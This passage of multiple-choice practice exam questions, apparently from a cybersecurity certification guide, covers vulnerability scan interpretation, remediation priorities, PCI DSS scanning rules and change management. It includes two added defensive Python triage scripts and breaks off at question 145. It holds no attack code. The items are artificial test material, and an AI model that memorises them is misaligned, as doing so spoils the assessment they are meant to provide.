111. Julian recently detected the vulnerability shown here on several servers in his environment. Because of the critical nature of the vulnerability, he would like to use a host firewall rule to block all access to the affected service until it is resolved. He verifies that the following TCP ports are open on the host firewall. Which one of the following does Julian not need to block to restrict access to this service? 

[Scan result: severity 5] Microsoft SMB Server Remote Code Execution Vulnerability (MS17-010) 
First Detected: 04/05/2017 at 02:25:12 (GMT-0400)  Last Detected: 04/05/2017 at 02:25:12 (GMT-0400) 
QID: 91345  Category: Windows  Vendor Reference: MS17-010  Service Modified: 03/15/2017 
CVSS Base: 9.3  CVSS Temporal: 6.9  CVSS3 Base: 8.1  CVSS3 Temporal: 7.1 
CVE ID: CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148, CVE-2017-0147 
Bugtraq ID: 96703, 96704, 96705, 96707, 96709, 96706 
PCI Vuln: Yes  Ticket State: Open 
THREAT: Microsoft Server Message Block (SMB) Protocol is a Microsoft network file sharing protocol used in Microsoft Windows. The Microsoft SMB Server is vulnerable to multiple remote code execution vulnerabilities due to the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. This security update is rated Critical for all supported editions of Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows Server 2012 and 2012 R2, Windows 8.1 and RT 8.1, Windows 10 and Windows Server 2016. 
IMPACT: A remote attacker could gain the ability to execute code by sending crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server. 
SOLUTION: Customers are advised to refer to Microsoft Advisory MS17-010 for more details. 

A. 137 
B. 139 
C. 389 
D. 445 

112. Ted recently ran a vulnerability scan of his network and was overwhelmed with results. He would like to focus on the most important vulnerabilities. How should Ted reconfigure his vulnerability scanner? 

A. Increase the scan sensitivity. 
B. Decrease the scan sensitivity. 
C. Increase the scan frequency. 
D. Decrease the scan frequency. 
113. After running a vulnerability scan, Janet discovered that several machines on her network are running Internet Explorer 8 and reported the vulnerability shown here. Which one of the following would not be a suitable replacement browser for these systems? 

[Scan result: severity 5] EOL/Obsolete Software: Microsoft Internet Explorer 8 Detected 
First Detected: 02/04/2016 at 19:05:19 (GMT-0400)  Last Detected: 04/05/2017 at 02:19:36 (GMT-0400) 
QID: 105646  Category: Security Policy  CVE ID: -  Bugtraq ID: - 
Vendor Reference: Microsoft Support Lifecycle for Internet Explorer 
CVSS Base: 9.3  CVSS Temporal: 7.9  CVSS3 Base: -  CVSS3 Temporal: - 
Service Modified: 03/09/2016  PCI Vuln: Yes  Ticket State: Open 
THREAT: Microsoft Internet Explorer is a graphical web browser developed by Microsoft and included as part of the Microsoft Windows operating systems. The host is running Internet Explorer 8 software. Microsoft ended support for Internet Explorer 8 on January 12, 2016. No further updates, including security updates, are available for Internet Explorer 8. 
IMPACT: The system is at high risk of being exposed to security vulnerabilities. Since the vendor no longer provides updates, obsolete software is more vulnerable to viruses and other attacks. 

A. Internet Explorer 10 
B. Google Chrome 
C. Mozilla Firefox 
D. Microsoft Edge 
114. Sunitha discovered the vulnerability shown here in an application developed by her organization. What application security technique is most likely to resolve this issue? 

[Scan result: severity 4] Sun Java RunTime Environment GIF Images Buffer Overflow Vulnerability 
First Detected: 08/04/2015 at 18:02:25 (GMT-0400)  Last Detected: 04/05/2017 at 03:03:58 (GMT-0400) 
QID: 115501  Category: Local  CVE ID: CVE-2007-0243  Vendor Reference: Oracle ID 1000058.1  Bugtraq ID: 22085 
CVSS Base: 6.8  CVSS Temporal: 5.3  CVSS3 Base: -  CVSS3 Temporal: - 
Service Modified: 10/21/2009  PCI Vuln: Yes  Ticket State: Open 

A. Bounds checking 
B. Network segmentation 
C. Parameter handling 
D. Tag removal 

115. Pete ran a vulnerability scan of several network appliances in his organization and received the scan result shown here. What is the simplest tool that an attacker could use to cause a denial-of-service attack on these appliances, provided that they are running ClearCase? 

[Scan result: severity 3] Rational ClearCase Portscan Denial of Service Vulnerability 
First Detected: 04/05/2017 at 03:56:19 (GMT-0400)  Last Detected: 04/05/2017 at 03:56:19 (GMT-0400) 
QID: 38248  Category: General remote services  CVE ID: CVE-2002-1322  Vendor Reference: -  Bugtraq ID: 6228 
CVSS Base: 5  CVSS Temporal: 3.9  CVSS3 Base: -  CVSS3 Temporal: - 
Service Modified: 06/03/2009  PCI Vuln: No 
THREAT: Rational ClearCase is a software configuration management solution that provides version control as well as repositories for software development. Please ignore this report if Rational ClearCase is not installed on the host. Rational ClearCase has been reported to be prone to a denial of service condition. It is possible to cause this condition by portscanning a system running the vulnerable version of ClearCase. This vulnerability has been reported on ClearCase 4.1 and 2002.05 systems. 
IMPACT: An attacker can exploit this vulnerability by making two consecutive portscans of a vulnerable system. This exploitation will cause ClearCase to crash. Restarting the ClearCase service is required to restore functionality. 
SOLUTION: The vendor has released a patch to address this issue. Download the latest patch from IBM ClearCase Support’s Web site. 

A. Metasploit 
B. Nessus 
C. nmap 
D. Wireshark 
116. Which one of the following protocols might be used within a virtualization platform for monitoring and management of the network? 

A. SNMP 
B. SMTP 
C. BGP 
D. EIGRP 
117. Sherry runs a vulnerability scan and receives the high-level results shown here. Her priority is to remediate the most important vulnerabilities first. Which system should be her highest priority? 

[Bar chart of scan results for System A through System D; the legend shows Medium and Informational severity counts per system. The bar values did not survive extraction.] 

A. A 
B. B 
C. C 
D. D 


118. Victor is configuring a new vulnerability scanner. He set the scanner to run scans of his entire data center each evening. When he went to check the scan reports at the end of the week, he found that they were all incomplete. The scan reports noted the error “Scan terminated due to start of preempting job.” Victor has no funds remaining to invest in the vulnerability scanning system. He does want to cover the entire data center. What should he do to ensure that scans complete? 

A. Reduce the number of systems scanned. 
B. Increase the number of scanners. 
C. Upgrade the scanner hardware. 
D. Reduce the scanning frequency. 
119. Vanessa ran a vulnerability scan of a server and received the results shown here. Her boss instructed her to prioritize remediation based upon criticality. Which issue should she address first? 

[Nessus scan results table with columns Severity, Plugin Name, Plugin Family and Count; the severity and count values did not survive extraction. The plugins listed, in order, with the plugin family where it is legible:] 

Apache 2.2.x < 2.2.28 Multiple Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.16 Multiple Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.17 Multiple Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.18 APR apr_fnmatch DoS (Web Servers) 
Apache 2.2.x < 2.2.21 mod_proxy_ajp DoS (Web Servers) 
Apache 2.2.x < 2.2.22 Multiple Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.23 Multiple Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.24 Multiple XSS Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.25 Multiple Vulnerabilities (Web Servers) 
Apache 2.2.x < 2.2.27 Multiple Vulnerabilities (Web Servers) 
SSH Weak Algorithms Supported 
FTP Supports Cleartext Authentication 
SSH Server CBC Mode Ciphers Enabled 
SSH Weak MAC Algorithms Enabled 
Service Detection (Service detection) 
Nessus SYN scanner (Port scanners) 
HTTP Server Type and Version (Web Servers) 
PHP Version (Web Servers) 
IMAP Service Banner Retrieval (Service detection) 
POP Server Detection (Service detection) 

A. Remove the POP server. 
B. Remove the FTP server. 
C. Upgrade the web server. 
D. Remove insecure cryptographic protocols. 
120. Gil is configuring a scheduled vulnerability scan for his organization using the QualysGuard scanner. If he selects the Relaunch On Finish scheduling option shown here, what will be the result? 

[Screenshot: QualysGuard “Edit Scheduled Vulnerability Scan” dialog, Scheduling section. Start: Aug 07, 2018 03:00, (GMT -05:00) United States, Connecticut (Eastern Standard Time), DST checkbox. Duration: Pause after 01 hours; Resume Days: Manually. Occurs: Daily / Weekly / Monthly, with “Relaunch on Finish” and “Ends after [N] Occurrences” options.] 

A. The scan will run once each time the schedule occurs. 
B. The scan will run twice each time the schedule occurs. 
C. The scan will run twice the next time the schedule occurs and once on each subsequent schedule interval. 
D. The scan will run continuously until stopped. 


121. Terry is reviewing a vulnerability scan of a Windows server and came across the vulnerability shown here. What is the risk presented by this vulnerability? 

[Scan result: severity 1] Detected Compatibility 8.3 Filename Feature 
First Detected: 09/28/2015 at 10:42:15 (GMT-0400)  Last Detected: 04/05/2017 at 04:21:18 (GMT-0400) 
QID: 90023  Category: Windows  CVE ID: -  Vendor Reference: -  Bugtraq ID: - 
Service Modified: 05/12/2009  PCI Vuln: No  (CVSS fields illegible in the scan) 
THREAT: NTFS supports backward compatibility with older 16-bit software by restricting the allowed filenames to 8.3 format. This feature seems to be activated on this host. 
IMPACT: 16-bit applications are extremely vulnerable and should not be used on a secure server. If you have not installed any 16-bit applications on a Windows NT-based computer, you can turn off automatic short (8-character name, 3-character extension) file name generation to speed up file and folder access on your computer running Windows NT. 
SOLUTION: We recommend that you remove this compatibility restriction. To do so, locate the following registry key, and then set the REG_DWORD ‘NtfsDisable8dot3NameCreation’ entry to ‘1’: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem 

A. An attacker may be able to execute a buffer overflow and execute arbitrary code on the server. 
B. An attacker may be able to conduct a denial-of-service attack against this server. 
C. An attacker may be able to determine the operating system version on this server. 
D. There is no direct vulnerability, but this information points to other possible vulnerabilities on the server. 


122. Andrea recently discovered the vulnerability shown here on the workstation belonging to a system administrator in her organization. What is the major likely threat that should concern Andrea? 

[Scan result: severity 3] PuTTY Local Information Disclosure Vulnerability 
First Detected: 04/05/2017 at 02:19:36 (GMT-0400)  Last Detected: 04/05/2017 at 02:19:36 (GMT-0400) 
QID: 123511  Category: Local  CVE ID: CVE-2015-2157  Vendor Reference: PuTTY vulnerability  Bugtraq ID: 72825 
CVSS Base: 2.1  CVSS Temporal: 1.6  CVSS3 Base: -  CVSS3 Temporal: - 
Service Modified: 03/08/2017  PCI Vuln: No 
THREAT: PuTTY is a client program for the SSH, Telnet and Rlogin network protocols. It is integrated in multiple applications on multiple operating systems for providing SSH, Telnet and Rlogin protocol support. The ssh2_load_userkey and ssh2_save_userkey functions implemented in vulnerable PuTTY versions fail to properly wipe SSH-2 private keys from memory. 

A. An attacker could exploit this vulnerability to take control of the administrator’s workstation. 
B. An attacker could exploit this vulnerability to gain access to servers managed by the administrator. 
C. An attacker could exploit this vulnerability to prevent the administrator from using the workstation. 
D. An attacker could exploit this vulnerability to decrypt sensitive information stored on the administrator’s workstation. 
123. Craig completed the vulnerability scan of a server in his organization and discovered the results shown here. Which one of the following is not a critical remediation action dictated by these results? 

[Scan results for a host running Windows Server 2008 R2 Enterprise 64 bit Edition Service Pack 1 (host IP illegible): Vulnerabilities (71), the first 24 of which are shown with severity and status. The CVSS and CVSS3 columns read “-” for every row.] 

Sev 5  Google Chrome Prior to 57.0.2987.98 Multiple Vulnerabilities  New 
Sev 5  Microsoft Cumulative Security Update for Windows (MS17-012)  New 
Sev 4  Google Chrome Prior to 57.0.2987.133 Multiple Vulnerabilities  New 
Sev 4  Microsoft Uniscribe Multiple Remote Code Execution and Information Disclosure Vulnerabilities (MS17-011)  New 
Sev 4  Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018)  New 
Sev 4  Microsoft Windows DirectShow Information Disclosure Vulnerability (MS17-021)  New 
Sev 4  Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022)  New 
Sev 4  Microsoft Windows Kernel Elevation of Privileges (MS17-017)  New 
Sev 3  NotePad++ “scilexer.dll” DLL Hijacking Vulnerability  New 
Sev 3  Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32) port 3389/tcp over SSL  New 
Sev 5  Oracle Java SE Critical Patch Update - October 2016  Active 
Sev 5  EOL/Obsolete Software: Microsoft VC++ 2005 Detected  Active 
Sev 5  Oracle Java SE Critical Patch Update - January 2017  Active 
Sev 5  Oracle Java SE Critical Patch Update - October 2012  Active 
Sev 5  Oracle Java SE Critical Patch Update - February 2013  Active 
Sev 5  Oracle Java SE JVM 2D Subcomponent Remote Code Execution Vulnerability (Oracle Security Alert for CVE-2013-1493)  Active 
Sev 5  EOL/Obsolete Software: Microsoft .NET Framework 4 - 4.5.1 Detected  Active 
Sev 5  EOL/Obsolete Software: Microsoft Internet Explorer 8 Detected  Active 
Sev 5  EOL/Obsolete Software: Oracle Java SE/JRE/JDK 6/1.6 Detected  Active 
Sev 5  Oracle Java SE Critical Patch Update - April 2013  Active 
Sev 5  Oracle Java SE Critical Patch Update - June 2013  Active 
Sev 5  Oracle Java SE Critical Patch Update - July 2014  Active 
Sev 5  Oracle Java SE Critical Patch Update - October 2014  Active 
Sev 5  Oracle Java SE Critical Patch Update - January 2015  Active 

A. Remove obsolete software. 
B. Reconfigure the host firewall. 
C. Apply operating system patches. 
D. Apply application patches. 


124. Tom’s company is planning to begin a bring your own device (BYOD) policy for mobile devices. Which one of the following technologies allows the secure use of sensitive information on personally owned devices, including providing administrators with the ability to wipe corporate information from the device without affecting personal data? 

A. Remote wipe 
B. Strong passwords 
C. Biometric authentication 
D. Containerization 

125. Sally discovered during a vulnerability scan that a system that she manages has a high-priority vulnerability that requires a patch. The system is behind a firewall and there is no imminent threat, but Sally wants to get the situation resolved as quickly as possible. What would be her best course of action? 

A. Initiate a high-priority change through her organization’s change management process. 
B. Implement a fix immediately and then document the change after the fact. 
C. Implement a fix immediately and then inform her supervisor of her action and the rationale. 
D. Schedule a change for the next quarterly patch cycle. 
126. Gene runs a vulnerability scan of his organization’s data center and produces a summary report to share with his management team. The report includes the chart shown here. When Gene’s manager reads the report, she points out that the report is burying important details because it is highlighting too many unimportant issues. What should Gene do to resolve this issue? 

[Chart: Vulnerabilities by Severity Level] 
Severity 5: 2 
Severity 4: 1 
Severity 3: 24 
Severity 2: 85 
Severity 1: 3 
Total: 115 

A. Tell his manager that all vulnerabilities are important and should appear on the report. 
B. Create a revised version of the chart using Excel. 
C. Modify the sensitivity level of the scan. 
D. Stop sharing reports with the management team. 
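An added example for questions 119 and 126 (not code from the book, nor from Nessus or Qualys): a short triage script over a constructed Nessus-style CSV export. It produces the per-severity counts behind a chart like Gene's, filters out the severity levels that swamp a management summary, and groups a long run of `Apache 2.2.x < 2.2.NN` findings like Vanessa's by the single remediation that closes all of them. The `REMEDIATION_RULES` mapping, the sample rows and the function names are assumptions of this example.

```python
"""Triage of a scan export: severity histogram and remediation grouping.

Added example for questions 119 and 126; it is not code from the book, nor
from Nessus or Qualys. It parses a constructed CSV in the shape of a Nessus
export (only the columns used here), then (1) counts findings per severity so
a management summary can leave out the low and informational noise, and
(2) groups plugins by the one remediation that closes them, so a run of
"Apache 2.2.x < 2.2.NN" findings is seen as a single upgrade rather than as
ten separate tasks. The plugin-to-remediation rules are illustrative
assumptions, not a vendor mapping.
"""
import csv
import io
import re
from collections import Counter, defaultdict

# Constructed sample export. Nessus severity scale: 0 Info, 1 Low, 2 Medium,
# 3 High, 4 Critical (Qualys, as in the chart above, uses 1-5 instead).
SAMPLE_EXPORT = """\
Severity,Plugin Name,Plugin Family,Host
3,Apache 2.2.x < 2.2.28 Multiple Vulnerabilities,Web Servers,10.0.0.5
4,Apache 2.2.x < 2.2.16 Multiple Vulnerabilities,Web Servers,10.0.0.5
2,Apache 2.2.x < 2.2.17 Multiple Vulnerabilities,Web Servers,10.0.0.5
2,SSH Weak Algorithms Supported,Misc.,10.0.0.5
1,FTP Supports Cleartext Authentication,FTP,10.0.0.5
1,SSH Server CBC Mode Ciphers Enabled,Misc.,10.0.0.5
0,Service Detection,Service detection,10.0.0.5
0,HTTP Server Type and Version,Web Servers,10.0.0.5
0,IMAP Service Banner Retrieval,Service detection,10.0.0.5
"""

# Assumed mapping from plugin-name patterns to the single action that closes
# them. Order matters: the first match wins.
REMEDIATION_RULES = [
    (re.compile(r"^Apache 2\.2\.x < "), "Upgrade Apache httpd to a supported release"),
    (re.compile(r"^SSH (Weak|Server CBC)"), "Restrict ciphers, MACs and KEX in sshd_config"),
    (re.compile(r"^FTP Supports Cleartext"), "Retire FTP or require FTPS/SFTP"),
]


def parse_export(text):
    """Rows of the export as dicts, with Severity converted to an int."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["Severity"] = int(row["Severity"])
        rows.append(row)
    return rows


def severity_histogram(findings):
    """Counts per severity: the numbers behind a 'vulnerabilities by severity' chart."""
    return Counter(f["Severity"] for f in findings)


def management_view(findings, min_severity=2):
    """Only findings at or above a threshold; what a summary for managers should show."""
    return [f for f in findings if f["Severity"] >= min_severity]


def remediation_for(plugin_name):
    for pattern, action in REMEDIATION_RULES:
        if pattern.search(plugin_name):
            return action
    return None  # informational detection, or a plugin with no mapped fix


def remediation_plan(findings):
    """(action, worst severity it closes, number of findings it closes),
    ordered by worst severity and then by count."""
    groups = defaultdict(list)
    for f in findings:
        action = remediation_for(f["Plugin Name"])
        if action is not None:
            groups[action].append(f["Severity"])
    plan = [(action, max(sevs), len(sevs)) for action, sevs in groups.items()]
    plan.sort(key=lambda item: (item[1], item[2]), reverse=True)
    return plan


if __name__ == "__main__":
    findings = parse_export(SAMPLE_EXPORT)
    print(sorted(severity_histogram(findings).items(), reverse=True))
    for action, worst, n in remediation_plan(findings):
        print(f"sev {worst}  x{n}  {action}")
```

Two things the raw list hides come out: the informational detections (service banners, port scanner) map to no action at all and belong off a management chart, and the three Apache findings collapse into one upgrade that also carries the worst severity, which is why "upgrade the web server" sits at the top of the plan.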


127. Veronica recently conducted a PCI DSS vulnerability scan of a web server and noted a critical PHP vulnerability that required an upgrade to correct. She applied the update. How soon must Veronica repeat the scan? 

A. Within 30 days 
B. At the next scheduled quarterly scan 
C. At the next scheduled annual scan 
D. Immediately 

128. Chandra’s organization recently upgraded the firewall protecting the network where they process credit card information. This network is subject to the provisions of PCI DSS. When is Chandra required to schedule the next vulnerability scan of this network? 

A. Immediately 
B. Within one month 
C. Before the start of next month 
D. Before the end of the quarter following the upgrade 

129. Bruce is concerned about the security of an industrial control system that his organization uses to monitor and manage systems in their factories. He would like to reduce the risk of an attacker penetrating this system. Which one of the following security controls would best mitigate the vulnerabilities in this type of system? 

A. Network segmentation 
B. Input validation 
C. Memory protection 
D. Redundancy 

130. Glenda routinely runs vulnerability scans of servers in her organization. She is having difficulty with one system administrator who refuses to correct vulnerabilities on a server used as a jumpbox by other IT staff. The server has had dozens of vulnerabilities for weeks and would require downtime to repair. One morning, her scan reports that all of the vulnerabilities suddenly disappeared overnight, while other systems in the same scan are reporting issues. She checks the service status dashboard, and the service appears to be running properly with no outages reported in the past week. What is the most likely cause of this result? 

A. The system administrator corrected the vulnerabilities. 
B. The server is down. 
C. The system administrator blocked the scanner. 
D. The scan did not run. 

131. Frank discovered during a vulnerability scan that an administrative interface to one of his storage systems was inadvertently exposed to the Internet. He is reviewing firewall logs and would like to determine whether any access attempts came from external sources. Which one of the following IP addresses reflects an external source? 

A. 10.15.1.100 
B. 12.8.1.100 
C. 172.16.1.100 
D. 192.168.1.100 

132. Nick is configuring vulnerability scans for his network using a third-party vulnerability scanning service. He is attempting to scan a web server that he knows exposes a CIFS file share and contains several significant vulnerabilities. However, the scan results only show ports 80 and 443 as open. What is the most likely cause of these scan results? 

A. The CIFS file share is running on port 443. 
B. A firewall configuration is preventing the scan from succeeding. 
C. The scanner configuration is preventing the scan from succeeding. 
D. The CIFS file share is running on port 80. 
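Question 131 turns on recognizing the RFC 1918 ranges. An added example (not from the book) of the same check applied to a constructed firewall log, using the standard library's `ipaddress` module; it also separates out addresses that are neither private nor routable on the Internet (100.64.0.0/10, loopback, link-local, the documentation ranges), listing those ranges explicitly rather than relying on `is_private`, whose coverage of special-purpose ranges differs between Python releases. The log line format, `SAMPLE_LOG` and the function names are assumptions of this example.

```python
"""Flag firewall log lines whose source is a genuine Internet address.

Added example for question 131; not from the book. The log format is
constructed (a syslog-style line with ACCEPT/DROP, src=, dst=, dport=). The
RFC 1918 check the question turns on is the core, but a real triage also has
to treat loopback, link-local, RFC 6598 shared address space (100.64.0.0/10)
and the RFC 5737 documentation ranges as "not an Internet host", so those
ranges are listed explicitly.
"""
import ipaddress
import re

RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Not RFC 1918, but still never a legitimate Internet source. Seeing these in
# an external-facing log points at spoofing or misconfiguration, not at an
# attacker's real address.
RESERVED = [ipaddress.ip_network(n) for n in (
    "100.64.0.0/10",                                       # RFC 6598 shared (CGNAT)
    "127.0.0.0/8", "169.254.0.0/16",                       # loopback, link-local
    "192.0.2.0/24", "198.51.100.0/24", "203.0.113.0/24",   # RFC 5737 documentation
    "0.0.0.0/8", "224.0.0.0/4", "240.0.0.0/4",             # "this" network, multicast, reserved
)]

LOG_RE = re.compile(
    r"(?P<action>ACCEPT|DROP)\s+src=(?P<src>[0-9a-fA-F.:]+)"
    r"\s+dst=(?P<dst>[0-9a-fA-F.:]+)\s+dport=(?P<dport>\d+)"
)

# Constructed sample: the four addresses from the question plus edge cases
# (172.32.0.1 sits just outside 172.16.0.0/12; 100.64.3.9 is CGNAT space).
SAMPLE_LOG = """\
Apr 05 02:10:01 fw1 ACCEPT src=10.15.1.100 dst=172.20.4.7 dport=8443
Apr 05 02:11:42 fw1 ACCEPT src=12.8.1.100 dst=172.20.4.7 dport=8443
Apr 05 02:12:09 fw1 DROP src=192.168.1.100 dst=172.20.4.7 dport=8443
Apr 05 02:13:55 fw1 ACCEPT src=172.16.1.100 dst=172.20.4.7 dport=8443
Apr 05 02:14:30 fw1 ACCEPT src=100.64.3.9 dst=172.20.4.7 dport=8443
Apr 05 02:15:02 fw1 DROP src=172.32.0.1 dst=172.20.4.7 dport=8443
Apr 05 02:16:18 fw1 ACCEPT src=203.0.113.77 dst=172.20.4.7 dport=8443
Apr 05 02:17:40 fw1 ACCEPT src=12.8.1.100 dst=172.20.4.7 dport=22
"""


def classify(addr):
    """'internal' (RFC 1918), 'reserved' (unroutable/special), or 'external'."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6:
        # ULA fc00::/7, link-local and loopback all report is_global == False
        return "external" if ip.is_global else "internal"
    if any(ip in net for net in RFC1918):
        return "internal"
    if any(ip in net for net in RESERVED):
        return "reserved"
    return "external"


def external_access_attempts(log_text, dport=None):
    """(src, action) for each line from an external source, optionally
    limited to one destination port (the exposed admin interface)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m is None:
            continue
        if dport is not None and int(m.group("dport")) != dport:
            continue
        if classify(m.group("src")) == "external":
            hits.append((m.group("src"), m.group("action")))
    return hits


if __name__ == "__main__":
    for src, action in external_access_attempts(SAMPLE_LOG, dport=8443):
        print(f"{action:6} from external {src}")
```

Note the 172.32.0.1 line: it looks private at a glance but 172.16.0.0/12 ends at 172.31.255.255, so the netmask arithmetic, not the first octet, decides. A dropped attempt from an external address is still worth recording, since it shows the interface was reachable and being probed.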
133. Thomas learned this morning of a critical security flaw that affects a major service used by his organization and requires immediate patching. This flaw was the subject of news reports and is being actively exploited. Thomas has a patch and informed stakeholders of the issue and received permission to apply the patch during business hours. How should he handle the change management process? 

A. Thomas should apply the patch and then follow up with an emergency change request after work is complete. 
B. Thomas should initiate a standard change request but apply the patch before waiting for approval. 
C. Thomas should work through the standard change approval process and wait until it is complete to apply the patch. 
D. Thomas should file an emergency change request and wait until it is approved to apply the patch. 


Questions 134 through 136 refer to the bare-metal virtualization environment shown here: 

[Figure: a bare-metal virtualization stack with three layers labeled A, B and C. The image did not survive extraction.] 

134. What component is identified by A in the image? 

A. Hypervisor 
B. Host operating system 
C. Guest operating system 
D. Physical hardware 

135. What component is identified by B in the image? 

A. Hypervisor 
B. Host operating system 
C. Guest operating system 
D. Physical hardware 

136. What component is identified by C in the image? 

A. Hypervisor 
B. Host operating system 
C. Guest operating system 
D. Physical hardware 


137. After running a vulnerability scan of systems in his organization’s development shop, Mike discovers the issue shown here on several systems. What is the best solution to this vulnerability? 

[Scan result: severity 5] EOL/Obsolete Software: Microsoft .NET Framework 4 - 4.5.1 Detected 
First Detected: 02/04/2016 at 19:05:19 (GMT-0400)  Last Detected: 04/05/2017 at 01:00:07 (GMT-0400) 
QID: 105648  Category: Security Policy  CVE ID: -  Bugtraq ID: - 
Vendor Reference: Microsoft .NET Framework Product Lifecycle 
CVSS Base: 9.3  CVSS Temporal: 7.9  CVSS3 Base: -  CVSS3 Temporal: - 
Service Modified: 03/10/2016  PCI Vuln: Yes  Ticket State: Open 

A. Apply the required security patches to this framework. 
B. Remove this framework from the affected systems. 
C. Upgrade the operating system of the affected systems. 
D. No action is necessary. 

138. Chris is preparing to conduct vulnerability scans against a set of workstations in his organization. He is particularly concerned about system configuration settings. Which one of the following scan types will give him the best results? 

A. Unauthenticated scan 
B. Credentialed scan 
C. External scan 
D. Internal scan 

139. Brian is configuring a vulnerability scan of all servers in his organization’s data center. He is configuring the scan to only detect the highest-severity vulnerabilities. He would like to empower system administrators to correct issues on their servers but also have some insight into the status of those remediations. Which approach would best serve Brian’s interests? 

A. Give the administrators access to view the scans in the vulnerability scanning system. 
B. Send email alerts to administrators when the scans detect a new vulnerability on their servers. 
C. Configure the vulnerability scanner to open a trouble ticket when it detects a new vulnerability on a server. 
D. Configure the scanner to send reports to Brian, who can notify administrators and track them in a spreadsheet. 

140. Tonya is configuring a new vulnerability scanner for use in her organization’s data center. Which one of the following values is considered a best practice for the scanner’s update frequency? 

A. Daily 
B. Weekly 
C. Monthly 
D. Quarterly 
141. Ben was recently assigned by his manager to begin the remediation work on the most
vulnerable server in his organization. A portion of the scan report appears below. What
remediation action should Ben take first?

A. Install patches for Adobe Flash.
B. Install patches for Firefox.
C. Run Windows Update.
D. Remove obsolete software.

[Scan report excerpt: Windows Server 2012 Datacenter 64-bit Edition, Vulnerabilities (50),
first 27 shown; the CVSS and CVSS3 columns were blank for every row in the screenshot]
Sev 5  New     Mozilla Firefox Multiple Vulnerabilities (MFSA2017-05, MFSA2017-06)
Sev 5  New     Adobe Flash Player Remote Code Execution Vulnerability (APSB17-07)
Sev 5  New     Mozilla Firefox Integer Overflow Vulnerability (MFSA2017-08)
Sev 5  New     Microsoft SMB Server Remote Code Execution Vulnerability (MS17-010)
Sev 5  New     Microsoft Cumulative Security Update for Internet Explorer (MS17-006)
Sev 5  New     Microsoft Windows Update for Vulnerabilities in Adobe Flash Player in Internet Explorer and Edge (MS17-023)
Sev 4  New     Microsoft XML Core Services Information Disclosure Vulnerability (MS17-022)
Sev 4  New     Microsoft IIS Server XSS Elevation of Privilege Vulnerability (MS17-016)
Sev 4  New     Microsoft Windows Kernel Elevation of Privileges (MS17-017)
Sev 4  New     Microsoft Uniscribe Multiple Remote Code Execution and Information Disclosure Vulnerabilities (MS17-011)
Sev 4  New     Microsoft Security Update for Windows Kernel-Mode Drivers (MS17-018)
Sev 4  New     Microsoft Windows DirectShow Information Disclosure Vulnerability (MS17-021)
Sev 3  New     NotePad++ "scilexer.dll" DLL Hijacking Vulnerability
Sev 3  New     Microsoft Windows PDF Library Remote Code Execution Vulnerability (MS17-009)
Sev 3  New     Birthday attacks against TLS ciphers with 64bit block size vulnerability (Sweet32), port 3389/tcp over SSL
Sev 5  Active  Mozilla Firefox Multiple Vulnerabilities (MFSA2016-94, MFSA2016-95)
Sev 5  Active  Mozilla Firefox Multiple Vulnerabilities (MFSA 2015-116 and MFSA 2015-133)
Sev 5  Active  Mozilla Firefox Multiple Vulnerabilities (MFSA2016-89, MFSA2016-90)
Sev 5  Active  Mozilla Firefox and Thunderbird SVG Animation Remote Code Execution Vulnerability (MFSA2016-92)
Sev 5  Active  EOL/Obsolete Software: Microsoft VC++ 2005 Detected
Sev 5  Active  Mozilla Firefox Multiple Vulnerabilities (MFSA2017-01, MFSA2017-02)
Sev 5  Active  Adobe Flash Player Remote Code Execution Vulnerability (APSB17-04)
Sev 5  Active  Microsoft Windows Update for Vulnerabilities in Adobe Flash Player in Internet Explorer (MS17-005)
Sev 5  Active  EOL/Obsolete Software: Microsoft .NET Framework 4 - 4.5.1 Detected
Sev 5  Active  Mozilla Firefox Multiple Vulnerabilities (MFSA 2016-85 to MFSA 2016-86)
Sev 4  Active  Microsoft Windows .NET Framework Information Disclosure Vulnerability (MS16-091)
Sev 4  Active  Mozilla Firefox Multiple Vulnerabilities (MFSA 2016-16 to MFSA 2016-38)



142. Tom is planning a series of vulnerability scans and wants to ensure that the organization
is meeting its customer commitments with respect to the scans' performance impact. What
two documents should Tom consult to find these obligations?

A. SLAs and MOUs
B. SLAs and DRPs
C. DRPs and BIAs
D. BIAs and MOUs

143. Don is evaluating the success of his vulnerability management program and would like to
include some metrics. Which one of the following would be the least useful metric?

A. Time to resolve critical vulnerabilities
B. Number of open critical vulnerabilities over time
C. Total number of vulnerabilities reported
D. Number of systems containing critical vulnerabilities

144. Don completed a vulnerability scan of his organization's virtualization platform from an
external host and discovered the vulnerability shown here. How should Don react?

[Scan report excerpt]
Severity 1: Remote Management Service Accepting Unencrypted Credentials Detected
First Detected: 09/04/2015 at 18:04:22 (GMT-0400)    Last Detected: 04/05/2017 at 00:05:04 (GMT-0400)
QID: 45242                                   CVSS Base: 4.3
Category: Information gathering              CVSS Temporal: 3.3
CVE ID: -                                    CVSS3 Temporal: -
Vendor Reference: -                          CVSS Environment:
Bugtraq ID: -                                Collateral Damage Potential: -
Service Modified: 08/10/2016                 Target Distribution: -
User Modified: -                             Confidentiality Requirement: -
Edited: No                                   Integrity Requirement: -
PCI Vuln: Yes                                Availability Requirement: -
Ticket State:

A. This issue should be corrected as time permits.
B. This issue has a very low severity and does not require remediation.
C. This is a critical issue that requires immediate adjustment of firewall rules.
D. This is a critical issue, and Don should shut down the platform until it is corrected.

145. Elliott runs a vulnerability scan of one of the servers belonging to his organization and
finds the results shown here. Which one of these statements is not correct?

[Scan report excerpt: Vulnerabilities (29). The severity column was illegible in the
screenshot and the CVSS and CVSS3 columns were blank; statuses are taken from the Status
column in order]
